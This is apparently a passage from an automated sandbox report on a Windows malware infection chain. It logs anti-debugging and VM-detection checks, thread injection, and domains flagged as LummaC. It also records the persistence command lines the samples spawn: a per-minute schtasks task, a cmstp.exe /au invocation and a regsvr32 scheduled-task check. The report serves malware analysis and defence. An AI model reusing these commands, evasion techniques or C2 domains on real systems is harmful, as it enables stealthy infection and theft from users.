                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 59516
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 59406
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 59290
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 59141
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 58839
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 58733
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 58625
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 58516
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 58406
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 58297
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 58188
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 58063
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 57938
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 57813
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 57676
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 57547
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 57437
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 57328
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 57218
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 57061
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 56952
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 56843
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 56734
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 56625
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 56470
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 56175
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 56047
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 55924
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 55797
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 55679
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 55538
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 55438
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 55272
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 55155
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 55045
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 54934
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 54826
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 54716
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 54609
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 54485
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 54360
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 54235
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 54110
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 53899
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 53656
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 53437
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 53327
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 53218
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                          Source: skotes.exe, skotes.exe, 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmp, e44fda3216.exe, 0000000B.00000002.3305605418.0000000000E51000.00000040.00000001.01000000.00000012.sdmp, e44fda3216.exe, 0000000B.00000002.3327618857.0000000005D35000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: NzL6O1Q.exe, 00000014.00000002.3302368508.0000000000BE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                          Source: db3cab6cee.exe, 00000037.00000002.3302081297.000001E194EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
                          Source: e44fda3216.exe, 0000000B.00000002.3295906531.00000000005AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: file.exe, 00000000.00000003.1682449990.000000000137A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: e44fda3216.exe, 0000000B.00000002.3295906531.000000000057A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                          Source: svchost.exe, 0000000A.00000002.3320594671.0000026F1B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3339501568.0000026F20A52000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3316261119.0000022087A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: e44fda3216.exe, 0000000B.00000002.3295906531.00000000005AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: e44fda3216.exe, 0000000B.00000002.3295906531.00000000005AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}
                          Source: file.exe, 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmp, e44fda3216.exe, 0000000B.00000002.3305605418.0000000000E51000.00000040.00000001.01000000.00000012.sdmp, e44fda3216.exe, 0000000B.00000002.3327618857.0000000005D35000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                          Source: svchost.exe, 00000035.00000002.3315665185.0000022087A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                          Source: 9LbUK15.exe, 00000006.00000002.3303779403.00000000005D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
                          Source: NzL6O1Q.exe, 0000001E.00000002.2504235326.0000000001320000.00000004.00000020.00020000.00000000.sdmp, NzL6O1Q.exe, 00000036.00000002.2623718238.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: svchost.exe, 00000035.00000002.3317388206.0000022087A6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP UDP Service Provider
                          Source: e44fda3216.exe, 0000000B.00000003.2750455557.000000000060B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__"fs"
                          Source: NzL6O1Q.exe, 00000038.00000002.2731408286.0000000000DF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllOO
                          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Hides threads from debuggers
                          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeThread information set: HideFromDebugger
                          Tries to detect sandboxes and other dynamic analysis tools (window names)
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeOpen window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeFile opened: SIWVID
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05050000 rdtsc 0_2_05050000
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8652B mov eax, dword ptr fs:[00000030h]0_2_00E8652B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8A302 mov eax, dword ptr fs:[00000030h]0_2_00E8A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0043A302 mov eax, dword ptr fs:[00000030h]1_2_0043A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0043652B mov eax, dword ptr fs:[00000030h]1_2_0043652B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0043A302 mov eax, dword ptr fs:[00000030h]5_2_0043A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0043652B mov eax, dword ptr fs:[00000030h]5_2_0043652B
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          LummaC encrypted strings found
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: robinsharez.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: handscreamny.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: chipdonkeruz.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: versersleep.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: crowdwarek.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: apporholis.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: femalsabler.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: soundtappysk.shop
                          Source: e44fda3216.exe, 0000000B.00000002.3305266069.0000000000C71000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: letterdrive.shop
                          Modifies the context of a thread in another process (thread injection)
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeThread register set: target process: 6192
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeThread register set: target process: 6596
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe "C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe "C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe "C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe "C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Users\user\Sys.infJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpProcess created: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT
                          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }"
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
                          Source: skotes.exe, skotes.exe, 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: Program Manager
                          Source: e44fda3216.exe, 0000000B.00000002.3305605418.0000000000E51000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: ~Program Manager
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0041DD91 cpuid 5_2_0041DD91
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1034109001\bed2608720.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1034109001\bed2608720.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\ VolumeInformationJump to behavior
